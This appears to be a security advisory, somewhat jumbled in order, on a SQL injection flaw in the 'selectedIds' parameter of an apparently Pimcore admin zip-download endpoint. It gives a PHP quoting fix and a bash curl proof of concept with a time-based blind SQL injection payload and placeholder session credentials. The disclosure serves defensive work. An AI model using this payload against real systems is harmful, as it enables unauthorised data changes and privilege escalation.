The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection.
foreach ($selectedIds as $selectedId) {
if ($selectedId) {
$quotedSelectedIds[] = $db->quote($selectedId);
}
}
#!/bin/bash
BASE_URL=http://localhost # REPLACE THIS!
CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS!
COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS!
SQL="(select*from(select(sleep(6)))a)"
curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \
-X GET \
-H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
-H "Cookie: ${COOKIE}" `
Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.
Summary
The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection.
Details
downloadAsZipJobsAction escape parameters, but downloadAsZipAddFilesAction not.
The following code should be added:
PoC
X-pimcore-csrf-token
header from any request to the backend, as well as thePHPSESSID
cookie.Impact
Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.